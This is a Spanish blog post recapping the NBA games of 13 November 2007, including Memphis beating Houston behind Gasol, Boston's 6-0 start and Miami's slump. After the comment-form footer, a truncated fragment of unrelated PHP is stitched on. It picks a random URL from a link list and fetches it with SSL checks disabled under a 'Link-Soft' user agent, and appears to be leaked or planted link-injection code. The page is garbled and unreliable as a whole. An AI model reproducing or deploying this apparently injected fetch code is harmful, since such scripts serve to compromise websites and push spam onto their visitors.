La crónica (13/11/07)

14 de November de 2007 por MagicJohnson32

El triunfo de los Grizzlies, liderados por Pau Gasol, ante los Rockets de McGrady (41 puntos), y la victoria de los Blazers contra los Pistons (con 15 minutos para Sergio Rodríguez) fueron lo más destacado de una noche que, por lo demás, no deparó sorpresas: triunfos de Celtics, Magic, Spurs, Mavs y Suns en partidos en los que partían como claros favoritos. Los Heat, por su parte, vuelven a las andadas: cayeron 76-91 en Charlotte y están 1-6, aunque se pueden consolar: los Sonics ya marchan 0-8.

Vamos con una crónica más detallada de los partidos jugados esta pasada madrugada:

Celtics 101 – Pacers 86

Set para los Celtics. La pasada temporada, los Celtics tardaron 19 partidos en alcanzar su sexto triunfo. Ésta, la franquicia de Boston se sitúa 6-0 tras ganar en el Conseco Fieldhouse con 31 puntos de Paul Pierce, que esta vez fue el encargado de dirigir las operaciones. Ray Allen logró 15 de sus 17 puntos en el tercer cuarto, momento en el que el partido se rompió del lado visitante. Garnett añadió 18 puntos y 11 rebotes, mientras que Granger fue el mejor pacer con 24-7.

Sonics 76 – Magic 103

Rashard Lewis volvió al pabellón en el que jugó todos sus partidos como local hasta el pasado verano. El Key Arena vio, una vez más, a un gran Rashard, autor de 22 puntos con 9 de 15 en tiros y 4 triples, que lideró a su equipo a la sexta victoria de la temporada. Bogans, Turkoglu, Howard y Ariza le acompañaron, mientras por los Sonics sólo Collison y Jeff Green se salvaron. De mal en peor van los de Seattle, que a los rumores de traslado de la franquicia le añaden un arranque desolador: 0-8.

Heat 76 – Bobcats 91

Sigue la crisis de unos Heat que, salvo en su partido ante los Suns, se muestran incapaces de alcanzar los 90 puntos y que, con frecuencia, no llegan a 80. Les sucedió anoche en Charlotte, donde encajaron una nueva derrota en un pobre partido que al descanso marchaba 35-40. Un parcial de 12-31 en el tercer cuarto encarriló la victoria para los Bobcats, en los que destacaron Wallace, Richardson y Okafor, autor de un nuevo doble-doble y de un espectacular tapón a O’Neal. Shaq, con 17 puntos y 7 de 14 en tiros, fue el mejor de su equipo y contó con escasa colaboración del resto de titulares, que acumularon un 9 de 34.

Rockets 99 – Grizzlies 105

McGrady brilló, dominó el partido desde un primer cuarto en el que logró 15 puntos, pero no ganó. Los tiros libres decidieron (34 de 41 para los Grizzlies, 17 de 24 para los Rockets) y el triunfo se quedó en Tennesse el día en que Gasol volvió a brillar. Pau anotó 26 puntos, con 14 de 17 en libres (incluyendo cuatro en el último minuto de partido) y contó con la sorprendente contribución ofensiva de Milicic, autor de 20 tantos. Miller, con un partido muy completo (17-7-6) y Gay (15) completaron el cuarteto que llevó a Memphis al triunfo. Navarro logró 8 puntos en 11 minutos. Por los Rockets, no sirvió la nueva exhibición de McGrady, 41 puntos con 16 de 28. Yao hizo 22 (7 de 12 en tiros de campo y 8 de 8 en libres), pero entre sus compañeros sólo Mike James alcanzó los 10 puntos. Es la segunda victoria de Memphis y la segunda derrota de los Rockets esta tempada.

Lakers 92 – Spurs 107

26 puntos y 9 asistencias de Parker, junto con la eficacia en el tiro exterior de los Spurs (con un 6 de 6 en triples para Bruce Bowen) desmontaron a los Lakers en uno de los peores partidos que se le recuerdan a Duncan (2 de 13 en tiros). Bryant, abucheado por el público, se quedó en 18 puntos (hizo 9 de 19 en lanzamientos y no dispuso de un solo tiro libre), con 9 rebotes, 5 asistencias y 3 tapones. Odom, en su segundo partido tras recuperarse de la operación en el hombro, logró 12-6-4; Bynum firmó otro doble-doble, Farmar aportó 16 puntos, y los Lakers dominaron el rebote 50-40; pero Parker (11 de 16), los trece triples de San Antonio y la aportación desde el banquillo de Ginóbili y Bonner valieron para dar a los Spurs una cómoda victoria.

Sixers 84 – Mavs 99

Jason Terry apareció en el tercer cuarto y los Sixers se quedaron sin opciones tras una igualada primera mitad a cuya conclusión llegaron con ventaja, 50-43. 12 puntos de Terry y un parcial 18-33 dieron completamente la vuelta al marcador. El mejor, sin embargo, fue Nowitzki, que reaccionó a su última actuación con 21 puntos, 12 rebotes, 8 asistencias y 3 tapones. Howard añadió 18 puntos, mientras Dalembert, Iguodala, Miller y Green fueron los mejores por el lado de los Sixers.

Knicks 102 – Suns 113

Para los Knicks es una misión casi imposible ganar en Phoenix. Sin Randolph, ni Quentin Richardson ni Marbury , podemos ahorrarnos el ‘casi’. Cuatro titulares de los Suns lograron al menos 21 puntos, Nash repartió 12 asistencias, y el partido permitió ver las mejores actuaciones de Grant Hill y Amaré en lo que va de temporada. Por los Knicks, Crawford, Curry, Fred Jones y Nate Robinson anotaron entre 21 y 17 puntos.

Pistons 94 – Blazers 102

Los Blazers lo ganan todo en el Rose Garden. Anoche aumentaron su racha a 4 triunfos, todos logrados en casa después de empezar la temporada con tres derrotas como visitantes. Y lo hicieron ante los Pistons, equipo al que no vencían en Portland la 2002-2003. Aldridge, Roy y Jack sumaron 62 puntos, Outlaw aportó 13 y Sergio aprovechó sus 15 minutos de juego con 7 puntos, 2 rebotes y 3 asistencias. La aportación del banquillo fue determinante: 48 puntos entre los cuatro suplentes de los Blazers, por 18 entre los cinco de los Pistons. Prince fue el mejor de Detroit con 20 puntos en un día que Rasheed fue abucheado por el que fuera su público.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>